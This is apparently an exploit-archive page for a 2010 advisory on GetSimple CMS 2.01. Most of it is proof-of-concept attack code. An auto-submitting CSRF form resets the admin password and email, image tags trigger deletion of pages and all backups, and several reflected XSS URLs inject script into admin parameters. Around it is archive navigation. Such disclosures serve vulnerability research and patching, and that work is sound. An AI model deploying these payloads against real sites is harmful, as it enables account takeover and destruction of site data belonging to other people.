GetSimple CMS 2.01 Cross Site Request Forgery / Cross Site Scripting

GetSimple CMS 2.01 Cross Site Request Forgery / Cross Site Scripting: Posted Jul 13, 2010; Authored by 10n1z3d; GetSimple CMS version 2.01 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | af05e53233bd4078e47fe83b36da3c5a5b3616f7892fe51c99a2cfc9dfc310de; Download | Favorite | View

GetSimple CMS 2.01 Cross Site Request Forgery / Cross Site Scripting

<!---
    Title: GetSimple CMS 2.01 Multiple Vulnerabilities (XSS/CSRF)
    Author: 10n1z3d <10n1z3d[at]w[dot]cn>
    Date: Mon 12 Jul 2010 12:11:45 PM EEST
    Vendor: http://get-simple.info/
    Download: http://www.box.net/get-simple
--->
 
-=[ CSRF PoC 1 - Change Admin Password ]=-
 
    <html>
        <head>
            <title>GetSimple CMS 2.01 Multiple Vulnerabilities (XSS/CSRF) - Change Admin Password</title>
        </head>
        <body onload="document.csrf.submit();">
                 
            <form name="csrf" action="http://[domain]/admin/settings.php" method="post">
                <!--- Edit these --->
                <input type="hidden" name="user" value="admin" />
                <input type="hidden" name="email" value="root@root.com" />
                <input type="hidden" name="sitepwd" value="rootroot"/>
                <input type="hidden" name="sitepwd_confirm" value="rootroot"/>
                <!--- Do not edit below --->
                <input type="hidden" name="submitted" value="Save Settings" />
            </form>
        </body>
    </html>
     
-=[ CSRF PoC 2 - Delete Page ]=-
 
    <img src="http://[domain]/admin/deletefile.php?id=about" alt="Do you see this?" />
 
-=[ CSRF PoC 3 - Delete All Backups ]=-
 
    <img src="http://[domain]/admin/backups.php?deleteall" alt="Do you see this?" />
 
-=[ CSRF PoC 4 - Logout The Administrator ]=-
 
    <img src="http://[domain]/admin/logout.php" alt="Do you see this?" />
 
-=[ XSS PoCs ]=-
 
    http://[domain]/admin/support.php?success=<script>alert('xss');</script>
    http://[domain]/admin/archive.php?upd=del-success&id=<script>alert('xss');</script>
    http://[domain]/admin/upload.php?upd=del-success&id=<script>alert('xss');</script>
    http://[domain]/admin/pages.php?error=<script>alert('xss');</script>
    http://[domain]/admin/pages.php?upd=edit-success&id=<script>alert('xss');</script>&type=delete
    http://[domain]/admin/pages.php?upd=edit-err&type=<script>alert('xss');</script>
 
-=[ Note ]=-
 
    More vulnerabilities exist in this version please see the following links:
     
    http://secunia.com/advisories/39464
    http://secunia.com/advisories/39720
 
<!---
    http://www.evilzone.org/
    irc.evilzone.org  (6697 / 9999)
--->

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

GetSimple CMS 2.01 Cross Site Request Forgery / Cross Site Scripting

GetSimple CMS 2.01 Cross Site Request Forgery / Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

GetSimple CMS 2.01 Cross Site Request Forgery / Cross Site Scripting

Share This

GetSimple CMS 2.01 Cross Site Request Forgery / Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems